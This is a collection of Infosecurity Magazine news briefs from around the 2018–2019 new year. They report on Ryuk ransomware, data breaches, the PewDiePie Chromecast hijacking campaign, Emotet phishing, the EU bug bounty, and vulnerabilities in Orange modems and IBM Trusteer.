Cyber Risk News

US Cloud Hoster Receives Christmas Ransomware 'Gift'

Info Security - Fri, 01/04/2019 - 10:00
US Cloud Hoster Receives Christmas Ransomware 'Gift'

A US cloud services provider has been struggling to shake off a ransomware attack that forced it to shut its network and hire extra help on Christmas Day.

There’s no information about the incident on the website of California-based Data Resolution, which apparently serves tens of thousands of customers from its datacenters in the US, Canada, Bermuda and the UK.

However, customer updates sent to KrebsOnSecurity indicate that the firm was infected by the Ryuk strain of ransomware on Christmas Eve. The initial attack vector was apparently a compromised user account, with servers soon infected.

The firm claimed it was forced to shut down its network to halt the spread of the ransomware, with extra staff hired in to help tackle the incident over the holiday season. However, it’s thought that the attackers were only out to extort the company, rather than looking for data to steal.

Linked to North Korea’s notorious Lazarus Group when it first appeared last year, the Ryuk strain of ransomware is believed to be responsible for the disruption of newspaper operations across the US last weekend.

Titles including the Los Angeles Times and Chicago Tribune were affected after Tribune Publishing and other facilities were hit by the ransomware.

Fred Kneip, CEO of CyberGRX, said the attack proves that organizations need to think carefully when selecting their cloud and managed hosting providers.

“It is vital for such organizations to confirm which security measures the third-party cloud provider is responsible for executing to ensure the security of the entire infrastructure,” he added.

“Hackers go for the path of least resistance, and much like a sitting duck, data is most vulnerable when it is at rest. For this reason, cloud services providers, and the organizations that welcome them as a third party, must work together to guarantee security qualifications are met.”

Categories: Cyber Risk News

EU Launches Bug Bounty for 15 Open Source Projects

Info Security - Thu, 01/03/2019 - 16:36
EU Launches Bug Bounty for 15 Open Source Projects

Working in partnership with HackerOne and Intigriti, the EU announced that the European Commission will launch a bug bounty program as part of the Free and Open Source Software Audit (FOSSA).

The third edition of FOSSA will include 15 software programs: 7-zip, Apache Kafka, Apache Tomcat, Digital Signature Services (DSS), Drupal, Filezilla, FLUX TL, the GNU C Library (glibc), KeePass, midPoint, Notepad++, PHP Symfony, PuTTY, VLC Media Player and WSO2, according to EU Parliament member Julia Reda.

Reda, who has written extensively about the security risks in Open SSL, launched the FOSSA project with her colleague Max Andersson in 2015, which is moving into phase three. The first 14 bug bounty projects will commence in January 2019, with the final project beginning in March.

While bug bounty programs call upon the hacker community to come together in search of vulnerabilities, applying the crowdsourced concept to open source presents unexpected challenges, according to Tim Mackey, senior technical evangelist at Black Duck by Synopsys.

“Since bug bounty programs favor the discovery of issues with an implicit assumption resources exist to resolve found issues, any security issue disclosed in public leaves users vulnerable until a fix is found.

“Once a fix is created, that fix needs to be delivered to users. This is by far the most significant hurdle for bug bounty–based efforts in FOSS. The core challenge being an assumption valid only with commercial software – [that] there is a single release stream to upgrade. As the FOSS community knows very well, branches of releases are very common, and it may be difficult to apply a fix from one branch to another.”

Though Mackey applauded the EU for creating the bug bounty program, he argued that funding developers and security professionals to work with the communities creating their target applications is also important.

“That way not only are issues being discovered, but the overall process can be improved while addressing any issues uncovered. It should be noted that the target projects represent a very small percentage of open source projects, and that while these are obviously critical projects for the EU, it would be worthwhile for the EU to investigate expanding this effort.”

In a December 28, 2018, tweet, Reda expressed the same sentiment. “That would indeed be better, but the @EU_Commission can’t just dish out money to developers who haven’t gone through an onerous public tender process that favours large consultancies that specialize in bidding for tenders rather than Drupal development.”

Categories: Cyber Risk News

Terrified PewDiePie Hacker Bids Dramatic Farewell

Info Security - Thu, 01/03/2019 - 15:59
Terrified PewDiePie Hacker Bids Dramatic Farewell

After targeting tens of thousands of devices in the CastHack campaign, TheHackerGiraffe feared that his ethical hacking might have gone too far and decided to put an end to his attempts to educate followers on vulnerable devices.

As Infosecurity Magazine reported earlier today, TheHackerGiraffe, in partnership with j3ws3r, exploited a vulnerability that allowed them to take advantage of routers with Universal Plug and Play (UPnP) enabled. The duo successfully hijacked more than 70,000 Chromecast-powered smart TVs, a vulnerability the hackers said was five years old.

Despite the campaign's effectiveness in getting Google to issue a patch for Chrome for Android to resolve a security security flaw that leaked information about smartphones' hardware model, firmware version and, indirectly, the device's security patch level, TheHackerGiraffe said in a Pastebin post that he is suffering from “the constant pressure of being afraid of being caught and prosecuted [that] has been keeping me up and giving me all kinds of fears and panic attacks.” 

Last year the PewDiePie hackers gained notoriety after exploiting vulnerabilities in printers accessible by anyone on the internet. In a live tweet video Thursday, @TheHackerGiraffe said that he received a direct message informing him that the FBI was building a case against him. Having been “in panic mode” for an entire month, Thursday’s message catapulted the ethical hacker into a deeper state of fear. In addition, he received multiple messages threatening to kill him and his family.

“Going after Chromecast didn’t exactly help,” he said. As a result, TheHackerGiraffe destroyed everything, from the server to the Cloudflare account to GitHub, Patreon, and even the PayPal account that was linked to Patreon. Despite his fears, the hacker stands by his actions, which were driven by his genuine desire to inform the public about the sensitive information that was being leaked in vulnerable devices.

Mike Bittner, digital security and operations manager of The Media Trust said, “The ability to access information via user agent strings will benefit exploit targeting regardless of what browser is used. App developers and browser developers should do a thorough mapping of what user information they gather and share and ensure they've obtained user consent for such activities. With GDPR regulators soon to issue penalties and similar privacy laws on the horizon, app developers will have to rely on their own custom string to override user-agent strings that conduct unauthorized data processes. By requiring user consent, these privacy laws will lift the veil on rampant online surveillance activities – whether deliberate or as a result of bugs – that have so far passed largely unnoticed by internet users.”

As of now, the hacker said, “everything is gone," and though he plans to leave his account active, he remains uncertain as to whether he will actively use the account.

“Most of all, I'm sorry to the people who supported me on Patreon. I didn't want to leave like this, you deserve more for your money, and I'm truly sorry that I've failed to meet your demands and my promises when it comes to the guides. I guess there is a lesson to be learned here, don't fly too close to the sun and then act like you don't know you'll get burned. Well, here I am, burned and roasted, awaiting my maybe-coming end. I thank you all, thank you all so much for the past month. It's been amazing to see all of you who wanted to learn hacking/cybersecurity. Please do push on, don't give up! Stay safe, stay legal, and most of all, be civil," TheHackerGiraffe wrote.

Categories: Cyber Risk News

Website of Dublin Tram Service, Luas, Hacked

Info Security - Thu, 01/03/2019 - 14:46
Website of Dublin Tram Service, Luas, Hacked

Dublin-based tram service provider, Luas, confirmed through social media that its website was hacked Thursday morning. After a malicious message demanding a payment of one Bitcoin was posted to the site, the company issued a tweet asking users to refrain from clicking on the website.

It appears as though the attacker has compromised the website as a sort of punishment for Luas not having addressed security issues the malicious actor had previously reported to the company.

“The website has been taken down by the IT company who manage it and their technicians are working on it. Luas are informed this may take the day to resolve. We will update customers via Facebook, Twitter @Luas, AA Roadwatch and the media should there be any change to Luas services today. Customers can also contact Luas Customer Care on LoCall 1850 300 604 and We apologise to all Luas customers for the inconvenience,” Luas wrote on its Facebook page.

A Luas spokesperson reportedly described the website as relatively static, which means that it does not interact with other sites that hold more sensitive customer information. In commenting on the potential risks due to the hack, infosec consultant @BrianHonan explained: “Depends on the actual impact but if it is a static site (as claimed in a statement by a spokesperson for Luas) then this is nothing more than an impact on the brand and reputation of the site.”

There are no reports that service has been impacted, and Luas said it will continue to keep customers updated via Twitter and Facebook as is necessary. Infosecurity Magazine contact Luas, which responded in an email stating: "There is currently a meeting taking place within our communications department to discuss the events that occurred today with the Luas website. Once the meeting has commenced, we will be releasing a press release shortly after 16:30. Please be on the lookout for this on our Twitter as well as our Facebook."

Categories: Cyber Risk News

Hackers Threaten to Release 9/11 Data 'Trove'

Info Security - Thu, 01/03/2019 - 11:53
Hackers Threaten to Release 9/11 Data 'Trove'

A notorious hacking group is claiming to have put up for sale stolen legal and other documents relating to the 9/11 terrorist attacks.

The individual(s) known as ‘The Dark Overlord’ claimed in a lengthy Pastebin notice to have hacked insurance giants Hiscox Syndicates and Lloyds of London and World Trade Center developer Silverstein Properties.

The resulting trove of 18,000 documents includes unspecified revelations on the infamous terror attacks of 2001 that killed nearly 3000.

“When major incidents like the WTC 911 incident happen, part of the litigation must involve SSI (Sensitive Security Information) and SCI (Special Compartment Information) from the likes of the FBI, CIA, TSA, FAA, DOD, and others being introduced into evidence, but of course this can't become public, for fear of compromising a nation's security, so they temporarily release these materials to the solicitor firms involved in the litigation with the strict demand they're destroyed after their use and that remain highly protected and confidential to only be used behind closed doors,” the noticed claimed.

“However, humans aren't perfect and many of these documents don't become destroyed, and when thedarkoverlord comes along hacking all these solicitor firms, investment banks, and global insurers, we stumble upon the juiciest secrets a government has to offer.”

Having already released several pretty unremarkable documents in an attempt to prove it means business, the group is seeking Bitcoin donations to publicly disclose more.

It also appealed to terrorist organizations and competing nation states such as China and Russia to bid, playing up to conspiracy theories about the attacks. Additionally, the group is trying to extort money from individuals mentioned in the docs to prevent them being published.

“What we'll be releasing is the truth,” it said. “The truth about one of the most recognizable incidents in recent history and one which is shrouded in mystery with little transparency and not many answers.”

At least part of the claims appears to check out. Hiscox released a statement on Monday saying that although it wasn’t hacked directly, an advisory law firm was back in April 2018, affecting “some of our commercial policyholders and other insurers.”

“One of the cases the law firm handled for Hiscox and other insurers related to subrogation litigation arising from the events of 9/11, and we believe that information relating to this was stolen during that breach,” it explained.

The Dark Overlord has previous when it comes to online extortion, having targeted Netflix, WestPark Capital, the London Bridge Plastic Surgery clinic and other businesses.

However, experts were cautious about the group’s latest claims.

“The problem with these sorts of demands is that there is usually little proof that the threat is as simple as they are suggesting. What’s to say that they even have new evidence?” argued ESET UK security expert, Jake Moore.

“It's like the run of fake sextortion blackmail emails that many people have seen over the last few months, which claim to have footage of intimate moments. We know they aren’t real but there will always be a niggling 'what if' feeling at the back of one’s mind, even with CISOs.”

Categories: Cyber Risk News

PewDiePie Hackers Take Aim at Chromecast TVs

Info Security - Thu, 01/03/2019 - 10:56
PewDiePie Hackers Take Aim at Chromecast TVs

Two hackers responsible for hijacking tens of thousands of printers with messages of support for a popular YouTuber have launched a new campaign aimed at connected TVs.

At the time of writing over 72,000 devices had been targeted in the CastHack campaign designed to raise awareness about Chromecast-powered smart TVs which may be leaking sensitive information on devices and the smart home to the public internet.

Ethical hackers ‘HackerGiraffe’ and ‘j3ws3r’ were able to take advantage of routers with UPnP enabled to hijack smart TVs, forcing them to play a YouTube video in support of popular vlogger PewDiePie.

The duo warned in a separate notice that the publicly exposed routers were leaking information on Wi-Fi networks and devices which could allow attackers not only to remotely play media, but also “rename your device, factory reset or reboot the device, force it to forget all Wi-Fi networks, force it to pair to a new Bluetooth speaker/Wi-Fi point, and so on.”

They urged affected users to disable UPnP on the router and stop port forwarding to ports 8008, 8443, and 8009.

“We want to help you, and also our favorite YouTubers (mostly PewDiePie),” they added. “We're only trying to protect you and inform you of this before someone takes real advantage of it. Imagine the consequences of having access to the information above.”

The two rose to fame in November and December last year after they were able to hijack connected printers around the world, forcing them to print out a message in support of PewDiePie.

However, they claim not to be responsible for the defacement of a Wall Street Journal page last month which also seemed to be the work of PewDiePie fans.

Tripwire security researcher, Craig Young, argued that in the smart home, usability often trumps security, meaning systems like Google Chromecast lack meaningful authentication checks for user requests.

“A key problem here is the misconception that LANs are actually private networks. The reality is that there can be a number of ways for external attackers to gain unauthorized access into these ‘private’ home networks,” he added.

“In this case, the miscreants have abused routers with UPnP misconfigurations but web browsing and mobile apps can also expose internal networks. My research from this past summer showing how Google Chromecast and Home could be hijacked via DNS rebinding is a prime example of this.”

Young said he hoped the CastHack campaign serves as a wake-up call for vendors to “rethink their authentication models.”

Categories: Cyber Risk News

Password Manager Users Exposed After Privacy Snafu

Info Security - Thu, 01/03/2019 - 10:29
Password Manager Users Exposed After Privacy Snafu

Data on over two million users of a password manager tool has been publicly exposed in another cloud storage misconfiguration incident.

Abine said on Monday that 2.4 million users of its Blur product from prior to January 6 2018 were affected. As well as password management, it offers the ability to mask phone numbers, credit card details and other information online to help protect user privacy and security.

The file in question, exposed in an Amazon S3 storage snafu, contained: email addresses, some first and last names, password hints for its MaskMe product, last and penultimate IP address used to log-in to Blur and Blur passwords encrypted using bcrypt with a unique salt for each.

The incident was discovered on December 13 but there’s no info on how long the data was exposed for.

“Importantly, there is no evidence that our users’ most critical data has been exposed, and we believe it is secure. There is no evidence that the usernames and passwords stored by our users in Blur, auto-fill credit card details, Masked Emails, Masked Phone numbers, and Masked Credit Card numbers were exposed. There is no evidence that user payment information was exposed,” the firm clarified.

“As a best practice, you should change your Blur password. If you use the same password you use on Blur on any other service, you should change those passwords to new unique passwords as well.”

The incident is yet another reminder of the insider threat: in this case stemming from accidental misconfiguration of cloud infrastructure.

It’s a risk that has plagued organizations for years and experts predict more cyber-criminals may actively be on the lookout for exposed databases as we head into the new year.

Password manager vendors are an attractive target given the sensitive information they store.

Categories: Cyber Risk News

Third Party Accessed Victorian Government Directory

Info Security - Wed, 01/02/2019 - 18:51
Third Party Accessed Victorian Government Directory

A list of employee names, work phone numbers and job titles available to government employees through the Victorian Government directory was reportedly accessed by an unauthorized third party. According to the Australian Broadcasting Corporation (ABC), information on approximately 30,000 Victorian public servants was stolen in a data breach, after an unknown party downloaded a portion of the directory.

Employees that might have been impacted were notified via an email message which explained: "Because of this incident you may experience increased phishing, spam and social engineering attempts via your work email address and telephone numbers. As always, you should be aware of these risks and remain vigilant when it comes to unsolicited communications via email and telephone," ABC reported.

Source: ABC News (Australia)

The breach was reported to the police, as well as to the Australian Cyber Security Centre and the Office of the Victorian Information Commissioner. In addition, a spokesperson for the Premier’s Department said in a prepared statement: “The Government will ensure any learnings from the investigation are put in place to better protect against breaches like this in the future.”

Even though the breach occurred in 2018, it is Australia’s first breach announcement for 2019. As security professionals prepare for the cyber challenges that the new year will bring, organizations around the globe are focusing on tightening up their privacy regulations and controls in the wake of back-to-back data breaches.

However, while businesses increasingly tend to privacy policies and compliance requirements, “accidents” remain common. These accidental privacy missteps can lead to the exposure of confidential, corporate or sensitive data, yet they are often a result of human error or a lapse in clear thinking due to the fast-pace, intense nature of certain work circumstances.

The investigation into the breach of the directory remains ongoing, and it is too early to say what happened; however, Adnan Dakhwe, head of security and compliance at Vera, said that corporations are often challenged when it comes to keeping pace with employee turnover, a common innocent mistake that can jeopardize the integrity of data, regardless of security measures and policies in place.

“Too often organizations stall in revoking access to sensitive files and corporate folders, once employees have parted ways with the organization. Keeping access permission updated in real time is essential to ensure private data isn’t jeopardized,” Dakhwe said.

Categories: Cyber Risk News

Cybersecurity Guidelines Released for Healthcare

Info Security - Wed, 01/02/2019 - 17:32
Cybersecurity Guidelines Released for Healthcare

Recognizing the threat to both critical infrastructure and human health and safety in the event of a cyber-attack, the Department of Health and Human Services (HHS) recently released Health Industry Cybersecurity Practices (HICP): Managing Threats and Protecting Patients, a publication nearly two years in the making.

“This publication is the result of the collaborative work HHS and its industry partners embarked on more than a year ago – namely, the development of practical, understandable, implementable, industry-led, and consensus-based voluntary cybersecurity guidelines to cost-effectively reduce cybersecurity risks for health care organizations of varying sizes, ranging from local clinics, regional hospital systems, to large health care systems,” wrote Eric Hargan, deputy secretary of HHS.

The document is the result of a collaborative partnership between industry and government, prompted by a mandate set forth by the Cybersecurity Act of 2015, Section 405(d), to develop practical cybersecurity guidelines to cost-effectively reduce cybersecurity risks for the healthcare industry, according to an HHS press release.

“The healthcare industry is truly a varied digital ecosystem. We heard loud and clear through this process that providers need actionable and practical advice, tailored to their needs, to manage modern cyber threats. That is exactly what this resource delivers; recommendations stratified by the size of the organization, written for both the clinician as well as the IT subject matter expert,” said Erik Decker, industry co-lead and chief information security and privacy officer for the University of Chicago Medicine, in the press release.

Though consensus-based and intended to help lead the industry toward best practices and procedures, the guidelines are voluntary. The processes put forth should – if implemented and followed – achieve the three core goals of reducing cybersecurity risks while supporting voluntary adoption and implementation and ensuring that the content within the guidelines remains actionable, practical, and relevant to a range of health care stakeholders.

Categories: Cyber Risk News

Attribution Unknown in Tribune Publishing Attack

Info Security - Wed, 01/02/2019 - 16:58
Attribution Unknown in Tribune Publishing Attack

The malware attack that disrupted the printing operations of the Chicago Tribune and other Tribune Publishing newspapers, including the Los Angeles Times, remains under investigation with no clear evidence that points to a source responsible for the attack, according to the Chicago Tribune.

“Sunday print editions were delivered in its markets across the U.S. but did not contain classified ads and some paid death notices, which share a common system disrupted by the malware," the Chicago-based company said.

The attack, which was reported to the FBI on December 28, 2018, disrupted newspaper delivery to Los Angeles Times subscribers, for which the company apologized in a note to readers.

As is often the case with high-profile attacks, people want to know what happened, yet the investigation remains ongoing despite some reports attributing the attack to the Lazarus Group, an advanced persistent threat (APT) group linked to North Korea. Some have been inclined to point to North Korea because an unidentified source familiar with the investigation reportedly said the malware had been identified as Ryuk ransomware, which has previously been linked to the Lazarus Group.

“While there’s plenty of speculation, there are relatively few facts available about this incident at the moment,” said Tim Erlin, VP, product management and strategy at Tripwire. “It’s unclear at this point whether this was a targeted or opportunistic attack. The impact to newspaper delivery could be collateral damage or the intended result. We should all be wary of jumping to conclusions without sufficient information in hand. The headline that grabs the most clicks may not be the most accurate.”  

Not everyone is heeding Erlin’s advice, however, which prompted Robert M. Lee, CEO and founder of Dragos Inc., to turn tweets into a blog post explaining why attribution is not transitive, particularly in the case of this malware attack.

“Shortly after Tribune Publishing lost operations and ability to print papers the press highlighted that there was a cyber attack,” Lee wrote. “The attack was highlighted as a targeted attack by a nation-state. This was all related to one anonymous insider at the company telling the media. Thus, early on I, and many others on social media, called for calm and patience while the details became public.”

Categories: Cyber Risk News

EU Looks to Reduce Exposure to Chinese 5G Risk: Report

Info Security - Wed, 01/02/2019 - 11:44
EU Looks to Reduce Exposure to Chinese 5G Risk: Report

The European Union is hoping to lead a more coordinated response to security concerns over Chinese 5G equipment makers, it has emerged.

Brussels wants to ensure it doesn’t end up with a situation where member states have unwittingly allowed Chinese kit to dominate across the region, according to the FT.

One unnamed diplomat told the paper that with although 5G auctions can raise billions for governments, the EU is "urging everyone to avoid making any hasty moves they might regret later.”

“It’s quite a serious strategic problem for the EU and we haven’t properly mapped the exposure,” they added. “The problem is every country is interested in the 5G auction because it’s a massive payday. Once these auctions have happened you need to avoid a situation where you end up with the entire continent being with one [equipment] provider.”

The EU wants to map its exposure to Chinese technology as national security concerns mount.

The US, Australia, New Zealand, Taiwan and Japan have all banned Huawei products on security fears to a lesser or greater extent, despite the firm repeatedly protesting its innocence.

In the UK, the Shenzhen giant has been forced to pledge £1.5bn over the next five years in a bid to address national security concerns raised by GCHQ. In spite of this, BT has claimed Huawei equipment will not be used in its core 5G network — although others have claimed the distinction between core and edge collapses in these next generation networks.

Australian Signals Directorate boss Mike Burgess argued last month that “high risk” vendors have been banned from the nation’s 5G networks because of the risk of “unbounded extrajudicial directions from a foreign government.”

Acknowledging that its efforts to mitigate 5G supplier risk would be a “complicated matter,” the EU diplomat told the FT that Brussels could play a more prominent role in helping to audit, monitor and vet companies.

Categories: Cyber Risk News

Vietnam's New Cyber Law Threatens Free Speech

Info Security - Wed, 01/02/2019 - 11:13
Vietnam's New Cyber Law Threatens Free Speech

The Vietnamese government has passed a sweeping new cybersecurity law which critics claim will help the one-party state continue to crack down on free speech.

The law will force internet companies like Facebook and Google to open offices in the country, store data on users locally and allow access to that data at the request of the authorities.

Social sites will be forced to remove any content deemed “toxic” — effectively giving the authorities a free hand in online censorship.

Businesses now have 12 months to comply with the new legislation, which was passed back in June.

Yet with tens of millions of active users in the country, the likes of Facebook could theoretically push back — especially as Hanoi needs the help of globally connected platforms as part of its ongoing bid to turn Vietnam into a south-east Asian technology hub.

“In the country’s deeply repressive climate, the online space was a relative refuge where people could go to share ideas and opinions with less fear of censure by the authorities. With the sweeping powers it grants the government to monitor online activity, this [law] means there is now no safe place left in Vietnam for people to speak freely,” argued Amnesty International’s director of global operations, Clare Algar, in June.

“This law can only work if tech companies cooperate with government demands to hand over private data. These companies must not be party to human rights abuses, and we urge them to use the considerable power they have at their disposal to challenge Vietnam’s government on this regressive legislation.”

The legislation brings Vietnam into line with repressive one-party states like China, whose censorship apparatus is notoriously effective.

It remains to be seen whether Hanoi’s latest move will stifle tech innovation and commercial digital development in the country, as has been predicted.

Categories: Cyber Risk News

Hackers Target North Korean Defectors

Info Security - Wed, 01/02/2019 - 10:06
Hackers Target North Korean Defectors

Personally identifiable information (PII) on nearly 1000 defectors from North Korea has been stolen in a cyber-raid, the South Korean government revealed late last week.

It’s believed that one of the 25 “Hana” support centers for defectors in the country was targeted by a classic phishing attack.

“Recognizing a possibility of one personal computer at the Hana Center in North Gyeongsang Province having been hacked, we carried out an on-site probe on December 19 in cooperation with the provincial government and the center and confirmed the computer was infected with a malicious code,” the Ministry of Unification said.

“In that computer, there was a file containing personal information of North Korean defectors. The file was confirmed to have been leaked.”

The phishing campaign involved the hijacking of an internal email account to make the phishing message appear more legitimate, according to reports.

Around 30,000 defectors currently live in the affluent south, but many still have family north of the border, which could make their personal information of interest to Pyongyang. Names, addresses and dates of birth were among the stolen details.

Those affected have been informed, and the ministry is said to be taking steps to air-gap computers storing sensitive data from 2019 to mitigate the risk of such attacks — although this is the first major breach of defectors’ personal data, according to Yonhap News.

An unnamed ministry official was reluctant to attribute the attack but all eyes will be on Pyongyang, given the hermit nation has become a prolific offensive state actor.

In October, FireEye revealed new research claiming that there are at least three main state-sponsored hacking groups operating today: Lazarus, APT38 and TEMP.Hermit.

Categories: Cyber Risk News

Amazon Order Confirmation Phishing Scam

Info Security - Mon, 12/24/2018 - 18:24
Amazon Order Confirmation Phishing Scam

All those who have relied upon the e-commerce giant Amazon to order their holiday gifts should heed caution when receiving order confirmation emails, as EdgeWave reportedly discovered a new and highly sophisticated malspam campaign sending fake Amazon order confirmation messages.  

The messages are reportedly quite convincing, and include subject lines that read "Your order," "Amazon order details" and "Your order 162-2672000-0034071 has shipped."

According to BleepingComputer, “When you open these emails, you will be shown an order confirmation that states your item has shipped, but without any details regarding what was ordered or tracking information. It then tells the recipient to click on the Order Details button in order to see more information.”

Credit: Bleeping Computer

Unsuspecting users who click on the link thinking they are downloading a Word document named order_details.doc are then instructed to “Enable Content” so that the order may be properly viewed. However, these unwitting users are actually enabling content that triggers the macros to execute a PowerShell command, which reportedly downloads and executes the Emotet banking Trojan.

EdgeWave told BleepingComputer that while researchers were testing the malicious document, the Emotet downloaded as keyandsymbol.exe even though the name of the Trojan was mergedboost.exe.

"Interestingly, these other servers are in Houston and Lansing. Playing Dora the Explorer for a moment, we’ve encountered a compromised email server in Columbia sending phishing email with a link to a server in Indonesia that downloads malware which then contacts compromised servers in the United States,” EdgeWave reportedly said.

Categories: Cyber Risk News

Grad Makes ROTC History with Cybersecurity Degree

Info Security - Mon, 12/24/2018 - 17:30
Grad Makes ROTC History with Cybersecurity Degree

Southern University celebrated a first in its history with the graduation of Davonne Franklin, 22, a member of the Army National Guard who was the school’s first ever cybersecurity graduate.

Franklin enrolled in the ROTC and attended Southern University after graduating from McKinley High in Baton Rouge. When he completed his basic training, he returned to Louisiana as a private with the goal of studying cybersecurity at Southern, where he was able to take part in an undergraduate research project in cybersecurity for the U.S. Department of Defense, according to The Advocate.

Now a second lieutenant who has graduated, Franklin will move on to be a cybersecurity officer, who will work to strengthen defenses against cyber-terrorism. "The biggest existential threat that faces our national security is cybersecurity," said Capt. Troy Glover, a member of the Southern University Army ROTC staff who spoke with The Advocate.

"I came back more focused," Franklin reportedly said. "When I returned, I knew I wanted to join Army ROTC and become an officer, and I wanted to change my field in the National Guard to cybersecurity. I also wanted to pursue a degree in computer science. I just needed that slight chance," Franklin said. "Growing up African-American, you can feel things are denied you."

Cybersecurity degrees are growing more popular around the globe, with curiosity about the industry calling for more details about what a cybersecurity degree entails. According to IT Governance, the three key pillars of a cybersecurity strategy involve people, process and technology.

Given the increased frequency and costs associated with attacks, educating users about cybersecurity is a critical part of securing the enterprise. “Cyber-attacks can disrupt and cause considerable financial and reputational damage to even the most resilient organization. If you suffer a cyber-attack, you stand to lose assets, reputation and business, and potentially face regulatory fines and litigation – as well as the costs of remediation,” according to IT Governance.

Categories: Cyber Risk News

New App Protects User Data on the Internet

Info Security - Mon, 12/24/2018 - 15:12
New App Protects User Data on the Internet

In response to the issues of data privacy questions that have erupted in the aftermath of the Facebook-Cambridge Analytical scandal, a startup, FigLeaf, co-founded by CEO Slava Kolomeichuk and CRO Yuriy Dvoinos, is developing an app that will help users understand how their personal information has been affected.

The new app is slated for use across different platforms and will include features that allow users to control access to their private information.

"We want to empower users and give them the tools to have a choice to remain private online," Dvoinos, who also serves as FigLeaf's Chief Revenue Officer, told in the company's first public interview about its plans, according to CBS News.

The 100 person team has been busy developing a viable solution to the privacy problem. According to the company website, “Privacy is a social necessity. This is what makes us different, interesting and hence, human. If we can provide people a choice to be private some of the time, we give them the opportunity to fully embrace their own creativity,” Slava said.

By scanning the dark web, the app is able to understand how much of the user’s personal data has been compromised. The app - still in BETA form and being tested - will reportedly provide users with the tools necessary to take back control of their data. Dvoinos told CBS News that even if a user chooses to remain completely private and not share any data, they should still be able to enjoy the internet.

"Right away, the customers can see how and what their exposure is like," Pankaj Srivastava, FigLeaf's COO and CMO told "So when we think about the function for our privacy app, Figleaf, when we think about it and think one is first we need to understand how you are exposed. Next we need to secure that information."

Categories: Cyber Risk News

UK Launches Long-Awaited Cyber Skills Strategy

Info Security - Mon, 12/24/2018 - 11:30
UK Launches Long-Awaited Cyber Skills Strategy

The UK government has launched a new cybersecurity skills strategy designed to reduce industry shortages, and a new independent body to help shape the future of the profession.

The Initial National Cyber Security Skills Strategy sets out not only to recruit more skilled professionals into the industry but also raise the awareness levels of the general workforce, improve education and training and ensure ensure the UK has a “well structured and easy-to-navigate” profession.

To that end, a new UK Cyber Security Council will receive £2.5m of public funding to help in its mission to “lay the structural foundations” of the profession.

It will appoint independent ambassadors to promote careers in cybersecurity; launch a refreshed CyberFirst brand in 2019; and commit to investing in projects to develop the next generation of talent.

At this stage there doesn’t seem to be an awful lot of detail, although the strategy itself is currently in a “Call for Views” phase which ends on March 1, 2019.

Talal Rajab, head of cyber and national security at industry body techUK, urged members to submit their feedback.

“Only through collaboration between government, industry and academia will the cyber skills gap be bridged and initiatives like CyberFirst and the work around developing a Cyber Council are significant work streams which techUK and industry will continue to support,” he added.

“Skills are vital to the development of the UK cybersecurity sector and attracting skilled talent is a constant challenge for industry, making this wide-ranging strategy most useful as a starting point for renewed efforts from both government and industry.”

New government figures suggest that over half (57%) of all UK firms and charities have a “basic technical cybersecurity skills gap.” The global shortfall of skilled professionals now stands at nearly three million.

Categories: Cyber Risk News

Over 500K School Staff and Students Hit by Breach

Info Security - Mon, 12/24/2018 - 10:43
Over 500K School Staff and Students Hit by Breach

The personal data of more than half a million staff and students of San Diego high schools from the past decade is now likely in the hands of hackers, it has emerged.

A statement from the San Diego Unified School District on Friday revealed that unauthorized access was achieved by a simple phishing campaign which compromised 50 staff log-ins back in January.

It was only 10 months later that IT staff detected the intrusion, with the threat finally eliminated on November 1.

Although GDPR regulators require 72-hour mandatory notifications, in the US police often request a delay to give them time to investigate and possibly apprehend the suspect.

An individual has apparently been identified and all stolen credentials are now useless, but the damage has arguably already been done.

Breached data includes: first and last name; date of birth; mailing and home address; phone number; student enrolment info; Social Security and/or State Student ID numbers; contact information on parents, guardians and emergency contacts; and staff benefits and payroll info including routing and account number, tax info, and salary info.

Data is said to go as far back as the 2008-9 school year.

There’s plenty in there for financially motivated cyber-criminals to monetize, not least the Social Security numbers of students.

Over one million US children fell victim to identity fraud in 2017, resulting in losses of $2.6bn, according to Javelin Strategy & Research. It’s thought that because they have limited financial records on file, children offer fraudsters a bigger opportunity to open fake accounts and the like in their name.

The case also highlights the continued threat from phishing: it featured in 93% of all data breaches analyzed by Verizon last year.

Categories: Cyber Risk News

Nearly 20,000 Orange Modems Leaking Wi-Fi Passwords

Info Security - Mon, 12/24/2018 - 10:12
Nearly 20,000 Orange Modems Leaking Wi-Fi Passwords

Nearly 20,000 Orange modems are being targeted thanks to a vulnerability leaking their SSID and Wi-Fi passwords, researchers at Bad Packets have warned.

The firm’s honeypots first picked up the attack traffic targeting Orange Livebox ADSL modems. After conducting a simple Shodan search, chief research officer, Troy Mursch found 19,490 such devices leaking their Wi-Fi credentials in plain text.

In addition, over 2000 were not leaking information but still classed as exposed to the internet.

“Many of the devices found to be leaking their WiFi password use the same password to administer the device (password reuse) or have not configured any custom password – so the factory default ‘admin/admin’ credentials are still applied,” he explained.

“This allows any remote user to easily access the device and maliciously modify the device settings or firmware. In addition, they can obtain the phone number tied to the modem and conduct other serious exploits detailed in this Github repository.”

Most of the affected devices were located in Spain, and the attack traffic was also linked back to an IP address associated to a Telefonica Spain customer.

“While we can only guess what the motive was behind these scans, it’s interesting to find the source is physically closer to the affected Livebox ADSL modems, than say a threat actor in another country,” Mursch continued. “This could allow them to connect to the WiFi network (SSID) if they were near one of the modems indexed by their scans.”

The flaw in question has been assigned as CVE-2018-20377. At the time of writing Orange had acknowledged the flaw and claimed it was investigating.

Home routers and modems continue to be a major security risk for consumers and remote workers, and a threat to organizations. Just last month researchers uncovered a new botnet of 100,000 compromised machines, comprised mainly of UPnP-enabled home routers.

Categories: Cyber Risk News

IBM Kernel-Based Vulnerability Discovered

Info Security - Fri, 12/21/2018 - 18:29
IBM Kernel-Based Vulnerability Discovered

Researchers have discovered a kernel-based vulnerability in a driver bundled with IBM Trusteer Rapport for MacOS, according to a recently published advisory from Trustwave. If exploited, the vulnerability could elevate privileges on the local machine, allowing an attacker to subvert or disable Trusteer altogether.

According to Trustwave, its researchers worked with IBM throughout the disclosure process. When IBM was unable to provide a patch during the 90-day disclosure policy, Trustwave reportedly extended it an additional 30 days.

“Unfortunately, that was also not enough time to develop a patch, and we feel it's important to alert the public about this issue,” Trustwave’s Neil Kettle wrote in a blog post.

The Trustwave SpiderLabs Security Advisory TWSL2018-012 stated: “IBM Trusteer Rapport is an advanced endpoint protection solution designed to protect users from financial malware and phishing attacks. Using industry-leading technology, Trusteer Rapport is designed to defend against MitBattacks, remove malware from endpoint devices and protect customers by preventing them from entering phishing sites. Trusteer Rapport offers a broad security solution that can help your organization reduce costs, enhance your fraud detection and prevention, and help to provide a seamless customer experience.”

